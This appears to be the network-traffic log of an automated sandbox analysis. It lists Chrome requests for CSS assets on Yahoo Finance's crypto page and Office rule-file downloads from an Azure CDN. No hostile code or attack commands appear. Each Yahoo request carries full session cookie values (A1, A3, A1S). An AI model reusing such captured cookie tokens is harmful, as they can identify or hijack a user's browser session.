Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Button.D4GRMVdO.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Icon.DgFg0-NP.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Select.G4QVlChI.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AccordionItem.COAy-xrR.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Link.CHR7GGSC.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Switch.BaMlRiYx.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Tabs.agUa80w0.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Tooltip.IRw8ojlh.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AdGroup.53S-Eidu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Header.BvCA0Mhu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Typography.CaSb88v6.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Dock.DxcyLucb.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/EventCalendarPreview.CD7glI99.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Spinner.DBQ4b_Oq.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Autocomplete.q9sgwYZU.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AddToFollowing.Cg_49_NO.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Dialog.Ch6G-Ji-.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MenuSurface.B2lZ9U34.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Sparkline.CfnaMg_z.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
